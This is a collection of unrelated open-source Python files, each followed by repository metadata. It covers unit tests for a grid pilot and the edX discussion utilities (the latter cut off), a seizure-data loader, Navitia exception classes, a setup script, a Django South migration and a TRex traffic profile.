""" Test case for each pilot command
"""
def test_InitJSON(self):
""" Test the pilot.json and command line parsing
"""
sys.argv[1:] = ['--Name', 'grid1.example.com', '--commandOptions', 'a=1,b=2', '-Z', 'c=3']
pp = PilotParams()
self.assertEqual(pp.commands, ['x', 'y', 'z'])
self.assertEqual(pp.commandExtensions, ['TestExtension1', 'TestExtension2'])
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
sys.argv[1:] = ['--Name', 'grid1.example.com',
'--commandOptions', 'a = 1, b=2', '-Z', ' c=3'] # just some spaces
pp = PilotParams()
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
sys.argv[1:] = ['--Name', 'grid1.example.com',
'--commandOptions=a = 1, b=2', '-Z', ' c=3'] # spaces and '=''
pp = PilotParams()
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
def test_CheckWorkerNode(self):
""" Test CheckWorkerNode command
"""
pp = PilotParams()
cwn = CheckWorkerNode(pp)
res = cwn.execute()
self.assertEqual(res, None)
def test_ConfigureSite(self):
""" Test ConfigureSite command
"""
pp = PilotParams()
pp.configureScript = 'echo'
cs = ConfigureSite(pp)
res = cs.execute()
self.assertEqual(res, None)
def test_NagiosProbes(self):
""" Test NagiosProbes command
"""
pp = PilotParams()
nagios = NagiosProbes(pp)
with open('Nagios1', 'w') as fp:
fp.write('#!/bin/sh\necho 123\n')
os.chmod('Nagios1', stat.S_IRWXU)
with open('Nagios2', 'w') as fp:
fp.write('#!/bin/sh\necho 567\n')
os.chmod('Nagios2', stat.S_IRWXU)
nagios.execute()
self.assertEqual(nagios.nagiosProbes, ['Nagios1', 'Nagios2'])
self.assertEqual(nagios.nagiosPutURL, 'https://127.0.0.2/')
#############################################################################
# Test Suite run
#############################################################################
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(PilotTestCase)
suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(CommandsTestCase))
testResult = unittest.TextTestRunner(verbosity=2).run(suite)
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
wkrzemien/Pilot
|
Pilot/tests/Test_Pilot.py
|
Python
|
gpl-3.0
| 4,260 | 0.006103 |
import scipy.io
import scipy.signal
import os
import sys
import matplotlib
import pandas as pd
import numpy as np
import random
# Load a matlab file into a data panel
# subject = Patient_N or Dog_N
# segment_type = interictal, ictal, or test
# downsample = True or False
# train_fraction = 0 < # <1, fraction of data to split into training and internal testing. This is ignored if segment_type = test.
def LoadMAT(subject, downsample):
dir = '/Users/dryu/Documents/DataScience/Seizures/data/clips/'+ subject + '/'
dict = {}
#load files in numerical order
files = os.listdir(dir)
files2 =[]
for i in range(len(files)):
qp = files[i].rfind('_') +1
files2.append( files[i][0:qp] + (10-len(files[i][files[i].rfind('_')+1:]) )*'0' + files[i][qp:] )
#print len(files), len(files2)
t = {key:value for key, value in zip(files2,files)}
files2 = t.keys()
files2.sort()
f = [t[i] for i in files2]
j = 0
for i in f:
seg = i[i.rfind('_')+1 : i.find('.mat')] # Number of segment, e.g. Dog_1_interictal_segment_250.mat => 250
segtype = i[i[0:i.find('_segment')].rfind('_')+1: i.find('_segment')] # Type of segment: ictal, interictal, test
d = scipy.io.loadmat(dir+i)
if j==0:
cols = range(len(d['channels'][0,0]))
cols = cols +['time']
if segtype == 'interictal' or segtype == "test":
l = -3600.0#np.nan
else:
#print i
l = d['latency'][0]
df = pd.DataFrame(np.append(d['data'].T, l+np.array([range(len(d['data'][1]))]).T/d['freq'][0], 1 ), index=range(len(d['data'][1])), columns=cols)
if downsample:
if np.round(d['freq'][0]) == 5000:
df = df.groupby(lambda x: int(np.floor(x/20.0))).mean()
if np.round(d['freq'][0]) == 500:
df = df.groupby(lambda x: int(np.floor(x/2.0))).mean()
if np.round(d['freq'][0]) == 400:
df = df.groupby(lambda x: int(np.floor(x/2.0))).mean()
df['time'] = df['time'] - (df['time'][0]-np.floor(df['time'][0]))*(df['time'][0] > 0)
dict.update({segtype+'_'+seg : df})
j = j +1
data = pd.Panel(dict)
return data
def MATToPickle(subject, downsample):
print "Welcome to MATToPickle(" + subject + ", ",
if downsample:
print "True",
else:
print "False",
print ")"
pickle_directory = "/Users/dryu/Documents/DataScience/Seizures/data/pickles/"
pickle_filename = subject
if downsample:
pickle_filename += "_downsampled"
pickle_filename = pickle_filename + ".pkl"
SavePanelAsPickle(LoadMAT(subject, downsample), pickle_filename)
def SavePanelAsPickle(data, pickle_filename):
data.to_pickle(pickle_filename)
def LoadPanelFromPickle(subject, downsample):
pickle_directory = "/Users/dryu/Documents/DataScience/Seizures/data/pickles/"
pickle_filename = subject
if downsample:
pickle_filename += "_downsampled"
pickle_filename += ".pkl"
return pd.read_pickle(pickle_filename)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description = 'Process input data into pandas pickles')
parser.add_argument('subjects', type=str, help='Subject, or all to do all subjects')
parser.add_argument('--downsample', action='store_true', help='Downsample data')
args = parser.parse_args()
if args.subjects == "all":
subjects = ['Dog_1','Dog_2', 'Dog_3', 'Dog_4', 'Patient_1', 'Patient_2', 'Patient_3', 'Patient_4','Patient_5','Patient_6','Patient_7','Patient_8',]
else:
subjects = [args.subjects]
for subject in subjects:
MATToPickle(subject, args.downsample)
|
DryRun/seizures
|
code/dataIO.py
|
Python
|
gpl-3.0
| 3,438 | 0.041303 |
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# channel `#navitia` on riot https://riot.im/app/#/room/#navitia:matrix.org
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
from flask import request
from werkzeug.exceptions import HTTPException
import logging
from jormungandr.new_relic import record_exception
__all__ = ["RegionNotFound", "DeadSocketException", "ApiNotFound", "InvalidArguments"]
def format_error(code, message):
error = {"error": {"id": code, "message": message}, "message": message}
return error
class RegionNotFound(HTTPException):
def __init__(self, region=None, lon=None, lat=None, object_id=None, custom_msg=None):
super(RegionNotFound, self).__init__()
self.code = 404
if custom_msg:
self.data = format_error("unknown_object", custom_msg)
return
if object_id:
if object_id.count(";") == 1:
lon, lat = object_id.split(";")
object_id = None
elif object_id[:6] == "coord:":
lon, lat = object_id[6:].split(":")
object_id = None
if not any([region, lon, lat, object_id]):
self.data = format_error("unknown_object", "No region nor " "coordinates given")
elif region and not any([lon, lat, object_id]):
self.data = format_error("unknown_object", "The region {0} " "doesn't exists".format(region))
elif not any([region, object_id]) and lon and lat:
self.data = format_error(
"unknown_object",
"No region available for the coordinates:" "{lon}, {lat}".format(lon=lon, lat=lat),
)
elif region == lon == lat is None and object_id:
self.data = format_error("unknown_object", "Invalid id : {id}".format(id=object_id))
else:
self.data = format_error("unknown_object", "Unable to parse region")
def __str__(self):
return repr(self.data['message'])
class DeadSocketException(HTTPException):
def __init__(self, region, path):
super(DeadSocketException, self).__init__()
error = 'The region {} is dead'.format(region)
self.data = format_error("dead_socket", error)
self.code = 503
class ApiNotFound(HTTPException):
def __init__(self, api):
super(ApiNotFound, self).__init__()
error = 'The api {} doesn\'t exist'.format(api)
self.data = format_error("unknown_object", error)
self.code = 404
class UnknownObject(HTTPException):
def __init__(self, msg):
super(UnknownObject, self).__init__()
error = 'The object {} doesn\'t exist'.format(msg)
self.data = format_error("unknown_object", error)
self.code = 404
class InvalidArguments(HTTPException):
def __init__(self, arg):
super(InvalidArguments, self).__init__()
self.data = format_error("unknown_object", "Invalid arguments " + arg)
self.code = 400
class UnableToParse(HTTPException):
def __init__(self, msg):
super(UnableToParse, self).__init__()
self.data = format_error("unable_to_parse", msg)
self.code = 400
class TechnicalError(HTTPException):
def __init__(self, msg):
super(TechnicalError, self).__init__()
self.data = format_error("technical_error", msg)
self.code = 500
class ConfigException(Exception):
def __init__(self, arg):
super(ConfigException, self).__init__(arg)
self.data = format_error("config_exception", "Invalid config " + arg)
self.code = 400
def log_exception(sender, exception, **extra):
logger = logging.getLogger(__name__)
message = ""
if hasattr(exception, "data") and "message" in exception.data:
message = exception.data['message']
error = '{} {} {}'.format(exception.__class__.__name__, message, request.url)
if isinstance(exception, (HTTPException, RegionNotFound)):
logger.debug(error)
if exception.code >= 500:
record_exception()
else:
logger.exception(error)
record_exception()
|
xlqian/navitia
|
source/jormungandr/jormungandr/exceptions.py
|
Python
|
agpl-3.0
| 5,255 | 0.001713 |
#!/usr/bin/env python
from __future__ import unicode_literals
from setuptools import setup
setup(
name='xcache',
version='0.2',
description='clean caches when needed',
author='Sven R. Kunze',
author_email='srkunze@mail.de',
url='https://github.com/srkunze/xcache',
license='MIT',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
],
py_modules=['xcache'],
install_requires=[],
)
|
srkunze/xcache
|
setup.py
|
Python
|
mit
| 573 | 0 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Currency'
db.create_table(u'currency_currency', (
('iso_code', self.gf('django.db.models.fields.CharField')(max_length=3, primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=120)),
('rate', self.gf('django.db.models.fields.FloatField')()),
))
db.send_create_signal(u'currency', ['Currency'])
def backwards(self, orm):
# Deleting model 'Currency'
db.delete_table(u'currency_currency')
models = {
u'currency.currency': {
'Meta': {'object_name': 'Currency'},
'iso_code': ('django.db.models.fields.CharField', [], {'max_length': '3', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'rate': ('django.db.models.fields.FloatField', [], {}),
}
}
complete_apps = ['currency']
|
pombredanne/1trillioneuros
|
webapp/currency/migrations/0001_initial.py
|
Python
|
gpl-3.0
| 1,131 | 0.006189 |
from django.utils import unittest
from spacescout_web.test.not_found import NotFound404Test
from spacescout_web.test.url_filtering import URLFiltering
|
uw-it-aca/spacescout_web
|
spacescout_web/tests.py
|
Python
|
apache-2.0
| 152 | 0 |
from trex_astf_lib.api import *
# IPV6 tunable example
#
# ipv6.src_msb
# ipv6.dst_msb
# ipv6.enable
#
class Prof1():
def __init__(self):
pass
def get_profile(self, **kwargs):
# ip generator
ip_gen_c = ASTFIPGenDist(ip_range=["16.0.0.0", "16.0.0.255"], distribution="seq")
ip_gen_s = ASTFIPGenDist(ip_range=["48.0.0.0", "48.0.255.255"], distribution="seq")
ip_gen = ASTFIPGen(glob=ASTFIPGenGlobal(ip_offset="1.0.0.0"),
dist_client=ip_gen_c,
dist_server=ip_gen_s)
c_glob_info = ASTFGlobalInfo()
c_glob_info.tcp.rxbufsize = 8*1024
c_glob_info.tcp.txbufsize = 8*1024
s_glob_info = ASTFGlobalInfo()
s_glob_info.tcp.rxbufsize = 8*1024
s_glob_info.tcp.txbufsize = 8*1024
return ASTFProfile(default_ip_gen=ip_gen,
# Defaults affects all files
default_c_glob_info=c_glob_info,
default_s_glob_info=s_glob_info,
cap_list=[
ASTFCapInfo(file="../avl/delay_10_http_browsing_0.pcap", cps=1)
]
)
def register():
return Prof1()
|
kisel/trex-core
|
scripts/astf/param_tcp_rxbufsize_8k.py
|
Python
|
apache-2.0
| 1,298 | 0.006163 |
# pylint: skip-file
import datetime
import json
import sys
from unittest import mock
from unittest.mock import Mock, patch
import ddt
import pytest
from django.test import RequestFactory, TestCase
from django.urls import reverse
from edx_django_utils.cache import RequestCache
from opaque_keys.edx.keys import CourseKey
from pytz import UTC
import lms.djangoapps.discussion.django_comment_client.utils as utils
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.course_modes.tests.factories import CourseModeFactory
from common.djangoapps.student.roles import CourseStaffRole
from common.djangoapps.student.tests.factories import AdminFactory, CourseEnrollmentFactory, UserFactory
from lms.djangoapps.courseware.tabs import get_course_tab_list
from lms.djangoapps.courseware.tests.factories import InstructorFactory
from lms.djangoapps.discussion.django_comment_client.constants import TYPE_ENTRY, TYPE_SUBCATEGORY
from lms.djangoapps.discussion.django_comment_client.tests.factories import RoleFactory
from lms.djangoapps.discussion.django_comment_client.tests.unicode import UnicodeTestMixin
from lms.djangoapps.discussion.django_comment_client.tests.utils import config_course_discussions, topic_name_to_id
from lms.djangoapps.teams.tests.factories import CourseTeamFactory
from openedx.core.djangoapps.course_groups import cohorts
from openedx.core.djangoapps.course_groups.cohorts import set_course_cohorted
from openedx.core.djangoapps.course_groups.tests.helpers import CohortFactory, config_course_cohorts
from openedx.core.djangoapps.django_comment_common.comment_client.utils import (
CommentClientMaintenanceError,
perform_request
)
from openedx.core.djangoapps.django_comment_common.models import (
CourseDiscussionSettings,
DiscussionsIdMapping,
ForumsConfig,
assign_role
)
from openedx.core.djangoapps.django_comment_common.utils import (
get_course_discussion_settings,
seed_permissions_roles,
set_course_discussion_settings
)
from openedx.core.djangoapps.util.testing import ContentGroupTestCase
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import TEST_DATA_MIXED_MODULESTORE, ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory, ToyCourseFactory
class DictionaryTestCase(TestCase):
def test_extract(self):
d = {'cats': 'meow', 'dogs': 'woof'}
k = ['cats', 'dogs', 'hamsters']
expected = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
assert utils.extract(d, k) == expected
def test_strip_none(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
expected = {'cats': 'meow', 'dogs': 'woof'}
assert utils.strip_none(d) == expected
def test_strip_blank(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': ' ', 'yetis': ''}
expected = {'cats': 'meow', 'dogs': 'woof'}
assert utils.strip_blank(d) == expected
class AccessUtilsTestCase(ModuleStoreTestCase):
"""
Base testcase class for access and roles for the
comment client service integration
"""
CREATE_USER = False
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
self.course_id = self.course.id
self.student_role = RoleFactory(name='Student', course_id=self.course_id)
self.moderator_role = RoleFactory(name='Moderator', course_id=self.course_id)
self.community_ta_role = RoleFactory(name='Community TA', course_id=self.course_id)
self.student1 = UserFactory(username='student', email='student@edx.org')
self.student1_enrollment = CourseEnrollmentFactory(user=self.student1)
self.student_role.users.add(self.student1)
self.student2 = UserFactory(username='student2', email='student2@edx.org')
self.student2_enrollment = CourseEnrollmentFactory(user=self.student2)
self.moderator = UserFactory(username='moderator', email='staff@edx.org', is_staff=True)
self.moderator_enrollment = CourseEnrollmentFactory(user=self.moderator)
self.moderator_role.users.add(self.moderator)
self.community_ta1 = UserFactory(username='community_ta1', email='community_ta1@edx.org')
self.community_ta_role.users.add(self.community_ta1)
self.community_ta2 = UserFactory(username='community_ta2', email='community_ta2@edx.org')
self.community_ta_role.users.add(self.community_ta2)
self.course_staff = UserFactory(username='course_staff', email='course_staff@edx.org')
CourseStaffRole(self.course_id).add_users(self.course_staff)
def test_get_role_ids(self):
ret = utils.get_role_ids(self.course_id)
expected = {'Moderator': [3], 'Community TA': [4, 5]}
assert ret == expected
def test_has_discussion_privileges(self):
assert not utils.has_discussion_privileges(self.student1, self.course_id)
assert not utils.has_discussion_privileges(self.student2, self.course_id)
assert not utils.has_discussion_privileges(self.course_staff, self.course_id)
assert utils.has_discussion_privileges(self.moderator, self.course_id)
assert utils.has_discussion_privileges(self.community_ta1, self.course_id)
assert utils.has_discussion_privileges(self.community_ta2, self.course_id)
def test_has_forum_access(self):
ret = utils.has_forum_access('student', self.course_id, 'Student')
assert ret
ret = utils.has_forum_access('not_a_student', self.course_id, 'Student')
assert not ret
ret = utils.has_forum_access('student', self.course_id, 'NotARole')
assert not ret
@ddt.ddt
class CoursewareContextTestCase(ModuleStoreTestCase):
"""
Base testcase class for courseware context for the
comment client service integration
"""
def setUp(self):
super().setUp()
self.course = CourseFactory.create(org="TestX", number="101", display_name="Test Course")
self.discussion1 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion1",
discussion_category="Chapter",
discussion_target="Discussion 1"
)
self.discussion2 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion2",
discussion_category="Chapter / Section / Subsection",
discussion_target="Discussion 2"
)
def test_empty(self):
utils.add_courseware_context([], self.course, self.user)
def test_missing_commentable_id(self):
orig = {"commentable_id": "non-inline"}
modified = dict(orig)
utils.add_courseware_context([modified], self.course, self.user)
assert modified == orig
def test_basic(self):
threads = [
{"commentable_id": self.discussion1.discussion_id},
{"commentable_id": self.discussion2.discussion_id}
]
utils.add_courseware_context(threads, self.course, self.user)
def assertThreadCorrect(thread, discussion, expected_title): # pylint: disable=invalid-name
"""Asserts that the given thread has the expected set of properties"""
assert set(thread.keys()) == set(['commentable_id', 'courseware_url', 'courseware_title'])
assert thread.get('courseware_url') == reverse('jump_to', kwargs={'course_id': str(self.course.id), 'location': str(discussion.location)})
assert thread.get('courseware_title') == expected_title
assertThreadCorrect(threads[0], self.discussion1, "Chapter / Discussion 1")
assertThreadCorrect(threads[1], self.discussion2, "Subsection / Discussion 2")
def test_empty_discussion_subcategory_title(self):
"""
Test that for empty subcategory inline discussion modules,
the divider " / " is not rendered on a post or inline discussion topic label.
"""
discussion = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion",
discussion_category="Chapter",
discussion_target="" # discussion-subcategory
)
thread = {"commentable_id": discussion.discussion_id}
utils.add_courseware_context([thread], self.course, self.user)
assert '/' not in thread.get('courseware_title')
@ddt.data((ModuleStoreEnum.Type.mongo, 2), (ModuleStoreEnum.Type.split, 1))
@ddt.unpack
def test_get_accessible_discussion_xblocks(self, modulestore_type, expected_discussion_xblocks):
"""
Tests that the accessible discussion xblocks having no parents do not get fetched for split modulestore.
"""
course = CourseFactory.create(default_store=modulestore_type)
# Create a discussion xblock.
test_discussion = self.store.create_child(self.user.id, course.location, 'discussion', 'test_discussion')
# Assert that created discussion xblock is not an orphan.
assert test_discussion.location not in self.store.get_orphans(course.id)
# Assert that there is only one discussion xblock in the course at the moment.
assert len(utils.get_accessible_discussion_xblocks(course, self.user)) == 1
# The above call is request cached, so we need to clear it for this test.
RequestCache.clear_all_namespaces()
# Add an orphan discussion xblock to that course
orphan = course.id.make_usage_key('discussion', 'orphan_discussion')
self.store.create_item(self.user.id, orphan.course_key, orphan.block_type, block_id=orphan.block_id)
# Assert that the discussion xblock is an orphan.
assert orphan in self.store.get_orphans(course.id)
assert len(utils.get_accessible_discussion_xblocks(course, self.user)) == expected_discussion_xblocks
class CachedDiscussionIdMapTestCase(ModuleStoreTestCase):
"""
Tests that using the cache of discussion id mappings has the same behavior as searching through the course.
"""
ENABLED_SIGNALS = ['course_published']
def setUp(self):
super().setUp()
self.course = CourseFactory.create(org='TestX', number='101', display_name='Test Course')
self.discussion = ItemFactory.create(
parent_location=self.course.location,
category='discussion',
discussion_id='test_discussion_id',
discussion_category='Chapter',
discussion_target='Discussion 1'
)
self.discussion2 = ItemFactory.create(
parent_location=self.course.location,
category='discussion',
discussion_id='test_discussion_id_2',
discussion_category='Chapter 2',
discussion_target='Discussion 2'
)
self.private_discussion = ItemFactory.create(
parent_location=self.course.location,
category='discussion',
discussion_id='private_discussion_id',
discussion_category='Chapter 3',
discussion_target='Beta Testing',
visible_to_staff_only=True
)
RequestCache.clear_all_namespaces() # clear the cache before the last course publish
self.bad_discussion = ItemFactory.create(
parent_location=self.course.location,
category='discussion',
discussion_id='bad_discussion_id',
discussion_category=None,
discussion_target=None
)
def test_cache_returns_correct_key(self):
usage_key = utils.get_cached_discussion_key(self.course.id, 'test_discussion_id')
assert usage_key == self.discussion.location
def test_cache_returns_none_if_id_is_not_present(self):
usage_key = utils.get_cached_discussion_key(self.course.id, 'bogus_id')
assert usage_key is None
def test_cache_raises_exception_if_discussion_id_map_not_cached(self):
DiscussionsIdMapping.objects.all().delete()
with pytest.raises(utils.DiscussionIdMapIsNotCached):
utils.get_cached_discussion_key(self.course.id, 'test_discussion_id')
def test_cache_raises_exception_if_discussion_id_not_cached(self):
cache = DiscussionsIdMapping.objects.get(course_id=self.course.id)
cache.mapping = None
cache.save()
with pytest.raises(utils.DiscussionIdMapIsNotCached):
utils.get_cached_discussion_key(self.course.id, 'test_discussion_id')
def test_xblock_does_not_have_required_keys(self):
assert utils.has_required_keys(self.discussion)
assert not utils.has_required_keys(self.bad_discussion)
def verify_discussion_metadata(self):
"""Retrieves the metadata for self.discussion and self.discussion2 and verifies that it is correct"""
metadata = utils.get_cached_discussion_id_map(
self.course,
['test_discussion_id', 'test_discussion_id_2'],
self.user
)
discussion1 = metadata[self.discussion.discussion_id]
discussion2 = metadata[self.discussion2.discussion_id]
assert discussion1['location'] == self.discussion.location
assert discussion1['title'] == 'Chapter / Discussion 1'
assert discussion2['location'] == self.discussion2.location
assert discussion2['title'] == 'Chapter 2 / Discussion 2'
def test_get_discussion_id_map_from_cache(self):
self.verify_discussion_metadata()
def test_get_discussion_id_map_without_cache(self):
DiscussionsIdMapping.objects.all().delete()
self.verify_discussion_metadata()
def test_get_missing_discussion_id_map_from_cache(self):
metadata = utils.get_cached_discussion_id_map(self.course, ['bogus_id'], self.user)
assert metadata == {}
def test_get_discussion_id_map_from_cache_without_access(self):
user = UserFactory.create()
metadata = utils.get_cached_discussion_id_map(self.course, ['private_discussion_id'], self.user)
assert metadata['private_discussion_id']['title'] == 'Chapter 3 / Beta Testing'
metadata = utils.get_cached_discussion_id_map(self.course, ['private_discussion_id'], user)
assert metadata == {}
def test_get_bad_discussion_id(self):
metadata = utils.get_cached_discussion_id_map(self.course, ['bad_discussion_id'], self.user)
assert metadata == {}
def test_discussion_id_accessible(self):
assert utils.discussion_category_id_access(self.course, self.user, 'test_discussion_id')
def test_bad_discussion_id_not_accessible(self):
assert not utils.discussion_category_id_access(self.course, self.user, 'bad_discussion_id')
def test_missing_discussion_id_not_accessible(self):
assert not utils.discussion_category_id_access(self.course, self.user, 'bogus_id')
def test_discussion_id_not_accessible_without_access(self):
user = UserFactory.create()
assert utils.discussion_category_id_access(self.course, self.user, 'private_discussion_id')
assert not utils.discussion_category_id_access(self.course, user, 'private_discussion_id')
class CategoryMapTestMixin:
"""
Provides functionality for classes that test
`get_discussion_category_map`.
"""
def assert_category_map_equals(self, expected, requesting_user=None):
"""
Call `get_discussion_category_map`, and verify that it returns
what is expected.
"""
actual = utils.get_discussion_category_map(self.course, requesting_user or self.user)
actual['subcategories']['Week 1']['children'].sort()
assert actual == expected
class CategoryMapTestCase(CategoryMapTestMixin, ModuleStoreTestCase):
"""
Base testcase class for discussion categories for the
comment client service integration
"""
def setUp(self):
super().setUp()
self.course = CourseFactory.create(
org="TestX", number="101", display_name="Test Course",
# This test needs to use a course that has already started --
# discussion topics only show up if the course has already started,
# and the default start date for courses is Jan 1, 2030.
start=datetime.datetime(2012, 2, 3, tzinfo=UTC)
)
# Courses get a default discussion topic on creation, so remove it
self.course.discussion_topics = {}
self.discussion_num = 0
self.instructor = InstructorFactory(course_key=self.course.id)
self.maxDiff = None # pylint: disable=invalid-name
self.later = datetime.datetime(2050, 1, 1, tzinfo=UTC)
def create_discussion(self, discussion_category, discussion_target, **kwargs):
self.discussion_num += 1
return ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id=f"discussion{self.discussion_num}",
discussion_category=discussion_category,
discussion_target=discussion_target,
**kwargs
)
def assert_category_map_equals(self, expected, divided_only_if_explicit=False, exclude_unstarted=True): # pylint: disable=arguments-differ
"""
Asserts the expected map with the map returned by get_discussion_category_map method.
"""
assert utils.get_discussion_category_map(self.course, self.instructor, divided_only_if_explicit, exclude_unstarted) == expected
def test_empty(self):
self.assert_category_map_equals({"entries": {}, "subcategories": {}, "children": []})
def test_configured_topics(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
def check_cohorted_topics(expected_ids):
self.assert_category_map_equals(
{
"entries": {
"Topic A": {"id": "Topic_A", "sort_key": "Topic A", "is_divided": "Topic_A" in expected_ids},
"Topic B": {"id": "Topic_B", "sort_key": "Topic B", "is_divided": "Topic_B" in expected_ids},
"Topic C": {"id": "Topic_C", "sort_key": "Topic C", "is_divided": "Topic_C" in expected_ids},
},
"subcategories": {},
"children": [("Topic A", TYPE_ENTRY), ("Topic B", TYPE_ENTRY), ("Topic C", TYPE_ENTRY)]
}
)
check_cohorted_topics([]) # default (empty) cohort config
set_discussion_division_settings(self.course.id, enable_cohorts=False)
check_cohorted_topics([])
set_discussion_division_settings(self.course.id, enable_cohorts=True)
check_cohorted_topics([])
set_discussion_division_settings(
self.course.id,
enable_cohorts=True,
divided_discussions=["Topic_B", "Topic_C"]
)
check_cohorted_topics(["Topic_B", "Topic_C"])
set_discussion_division_settings(
self.course.id,
enable_cohorts=True,
divided_discussions=["Topic_A", "Some_Other_Topic"]
)
check_cohorted_topics(["Topic_A"])
# unlikely case, but make sure it works.
set_discussion_division_settings(
self.course.id,
enable_cohorts=False,
divided_discussions=["Topic_A"]
)
check_cohorted_topics([])
def test_single_inline(self):
self.create_discussion("Chapter", "Discussion")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Chapter", TYPE_SUBCATEGORY)]
}
)
def test_inline_with_always_divide_inline_discussion_flag(self):
self.create_discussion("Chapter", "Discussion")
set_discussion_division_settings(self.course.id, enable_cohorts=True, always_divide_inline_discussions=True)
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion": {
"id": "discussion1",
"sort_key": None,
"is_divided": True,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Chapter", TYPE_SUBCATEGORY)]
}
)
def test_inline_without_always_divide_inline_discussion_flag(self):
self.create_discussion("Chapter", "Discussion")
set_discussion_division_settings(self.course.id, enable_cohorts=True)
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Chapter", TYPE_SUBCATEGORY)]
},
divided_only_if_explicit=True
)
def test_get_unstarted_discussion_xblocks(self):
self.create_discussion("Chapter 1", "Discussion 1", start=self.later)
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
"start_date": self.later
}
},
"subcategories": {},
"children": [("Discussion 1", TYPE_ENTRY)],
"start_date": self.later,
"sort_key": "Chapter 1"
}
},
"children": [("Chapter 1", TYPE_SUBCATEGORY)]
},
divided_only_if_explicit=True,
exclude_unstarted=False
)
def test_tree(self):
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 1", "Discussion 2")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion")
self.create_discussion("Chapter 3 / Section 1", "Discussion")
def check_divided(is_divided):
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_divided": is_divided,
},
"Discussion 2": {
"id": "discussion2",
"sort_key": None,
"is_divided": is_divided,
}
},
"subcategories": {},
"children": [("Discussion 1", TYPE_ENTRY), ("Discussion 2", TYPE_ENTRY)]
},
"Chapter 2": {
"entries": {
"Discussion": {
"id": "discussion3",
"sort_key": None,
"is_divided": is_divided,
}
},
"subcategories": {
"Section 1": {
"entries": {},
"subcategories": {
"Subsection 1": {
"entries": {
"Discussion": {
"id": "discussion4",
"sort_key": None,
"is_divided": is_divided,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
},
"Subsection 2": {
"entries": {
"Discussion": {
"id": "discussion5",
"sort_key": None,
"is_divided": is_divided,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Subsection 1", TYPE_SUBCATEGORY), ("Subsection 2", TYPE_SUBCATEGORY)]
}
},
"children": [("Discussion", TYPE_ENTRY), ("Section 1", TYPE_SUBCATEGORY)]
},
"Chapter 3": {
"entries": {},
"subcategories": {
"Section 1": {
"entries": {
"Discussion": {
"id": "discussion6",
"sort_key": None,
"is_divided": is_divided,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
